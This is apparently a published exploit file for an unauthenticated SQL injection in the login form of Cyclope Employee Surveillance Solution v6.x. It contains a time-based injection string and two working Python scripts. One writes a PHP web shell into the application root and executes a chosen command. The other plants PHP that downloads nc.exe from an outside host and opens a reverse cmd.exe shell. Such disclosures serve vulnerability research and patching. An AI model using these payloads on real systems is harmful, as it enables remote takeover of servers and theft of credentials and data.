142 lines
No EOL
4.5 KiB
Python
Executable file
142 lines
No EOL
4.5 KiB
Python
Executable file
# Author: loneferret of Offensive Security
|
|
# Product: Cyclope Employee Surveillance Solution v6.0
|
|
# Version: 6.0
|
|
# Vendor Site: http://www.cyclope-series.com/
|
|
# Software Download: http://www.cyclope-series.com/download/index.html
|
|
|
|
# Software description:
|
|
# The employee monitoring software developed by Cyclope-Series is specially designed to inform
|
|
# and equip management with statistics relating to the productivity of staff within their organization.
|
|
|
|
# Vulnerability:
|
|
# Due to improper input sensitization, many parameters are prone to SQL injection.
|
|
# Most importantly, the username parameter in the application's login form.
|
|
#
|
|
|
|
# Effected versions:
|
|
# Change script accordingly. You can see the folder's name when viewing the source code
|
|
# from the login screen.
|
|
# 6.1.0: Default install path: C:\Program Files\Cyclope\Ni4xLjA=
|
|
# 6.2.0: Default install path: C:\Program Files\Cyclope\Ni4yLjA=
|
|
# 6.2.1: Default install path: C:\Program Files\Cyclope\Ni4yLjE=
|
|
# 6.3.0: Default install path: C:\Program Files\Cyclope\Ni4zLjA=
|
|
|
|
|
|
# PoC 1:
|
|
# MySql sleep for 5 seconds.
|
|
# No Authentication Required.
|
|
# Page: /index.php
|
|
# Form: login
|
|
# Vulnerable Parameter: username
|
|
# username: x' or sleep(5) and '1'='1
|
|
# password: whatever
|
|
|
|
# As stated, nothing is checked before passing "username" to MySql.
|
|
# This results in MySql sleeping for 5 seconds, and a unsuccessful
|
|
# attempt.
|
|
|
|
# PoC 2:
|
|
# Remote Code Execution
|
|
# No Authentication Required.
|
|
# Page: /index.php
|
|
# Form: login
|
|
# Vulnerable Parameter: username
|
|
|
|
# Creates a small php shell in the application's root folder.
|
|
# It also has the added bonus of writing the administrator username and password
|
|
# Side note:
|
|
# This assumes a default installation. Which is located in "C:\Program Files\Cyclope\Ni4xLjA=\"
|
|
# If you are wondering what is "Ni4xLjA=", well it's the software's version number in Base64 (6.1.0).
|
|
# Using Owasp Zap, you can spider the site to find the application's root folder if ever it changes.
|
|
|
|
----Python Script Simple Backdoor----
|
|
#!/usr/bin/python
|
|
|
|
import urllib, cookielib
|
|
import urllib2
|
|
import sys
|
|
|
|
|
|
print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution"
|
|
print "[*] Vulnerability discovered by loneferret"
|
|
|
|
print "[*] Offensive Security - http://www.offensive-security.com\n"
|
|
if (len(sys.argv) != 3):
|
|
print "[*] Usage: poc.py <RHOST> <CMD>"
|
|
print "[*] Ex. : poc.py 127.0.0.1 ipconfig"
|
|
exit(0)
|
|
|
|
rhost = sys.argv[1]
|
|
rcmd = sys.argv[2]
|
|
|
|
backdoor = "<?php system($_GET['exe']);?>"
|
|
|
|
prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' "
|
|
prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex')
|
|
|
|
act = 'auth-login'
|
|
pag = 'login'
|
|
password = 'hole'
|
|
|
|
cj = cookielib.CookieJar()
|
|
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
|
|
post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password})
|
|
print "[*] Sending evil payload"
|
|
resp = opener.open("http://%s:7879/" % rhost, post_params)
|
|
print "[*] Triggering backdoor"
|
|
cmd = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost
|
|
page = urllib.urlopen(cmd)
|
|
print "[*] Executing command: %s\n" % rcmd
|
|
shell = 'http://%s:7879/Ni4xLjA=/cmd.php?exe=%s' % (rhost,rcmd)
|
|
try:
|
|
page = urllib.urlopen(shell)
|
|
cmd = page.read()
|
|
print cmd
|
|
except:
|
|
print "[-] Oups! Somthing happened"
|
|
|
|
|
|
|
|
|
|
---Python Getting Shell---
|
|
#!/usr/bin/python
|
|
|
|
import urllib, cookielib
|
|
import urllib2
|
|
import sys
|
|
|
|
|
|
print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution"
|
|
print "[*] Vulnerability discovered by loneferret"
|
|
|
|
print "[*] Offensive Security - http://www.offensive-security.com\n"
|
|
if (len(sys.argv) != 2):
|
|
print "[*] Usage: poc.py <RHOST>"
|
|
exit(0)
|
|
|
|
rhost = sys.argv[1]
|
|
|
|
backdoor = '''<?php
|
|
file_put_contents("nc.exe",
|
|
file_get_contents("http://172.16.194.163/nc.exe"));
|
|
shell_exec("nc.exe 172.16.194.163 4444 -e cmd.exe");?>'''
|
|
|
|
prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' "
|
|
prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex')
|
|
|
|
act = 'auth-login'
|
|
pag = 'login'
|
|
password = 'hole'
|
|
|
|
cj = cookielib.CookieJar()
|
|
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
|
|
post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password})
|
|
print "[*] Sending evil payload"
|
|
try:
|
|
resp = opener.open("http://%s:7879/" % rhost, post_params)
|
|
print "[*] Triggering Shell"
|
|
shell = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost
|
|
page = urllib.urlopen(shell)
|
|
cmd = page.read()
|
|
except:
|
|
print "[-] Oups! Somthing happened" |